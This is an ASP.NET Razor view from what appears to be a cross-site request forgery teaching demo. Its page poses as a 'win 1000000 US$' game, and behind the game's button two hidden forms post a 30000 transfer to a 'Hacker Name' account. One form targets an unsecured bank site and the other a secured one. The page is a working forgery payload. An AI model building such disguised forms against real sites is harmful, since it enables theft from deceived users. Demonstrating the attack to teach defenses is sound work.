
@{
    ViewData["Title"] = "CompromisedTransfer";
}

<h1>Compromised Transfer</h1>

<div class="row form-horizontal">
    <div class="col">
        <div>
            <h5>Un-Secured Site</h5>
            Win 1000000 US$ by playing ultimate game
            <form action="http://www.banksite.com:84/Account/Transfer" method=post>
                <input type=hidden name="amount" value="30000" /> <input type=hidden name="ToAccountNumber" value="445522" />
                <input type=hidden name="ToAccountName" value="Hacker Name" />
                <input type=submit value="Play the ultimate game" />
            </form>
        </div>
    </div>
    <div class="col">
        <div>
            <h5>Secured Site</h5>
            Win 1000000 US$ by playing ultimate game
            <form action="http://www.securedbanksite.com:85/Account/Transfer" method=post>
                <input type=hidden name="amount" value="30000" /> <input type=hidden name="ToAccountNumber" value="445522" />
                <input type=hidden name="ToAccountName" value="Hacker Name" />
                <input type=submit value="Play the ultimate game" />
            </form>
        </div>
    </div>
</div>
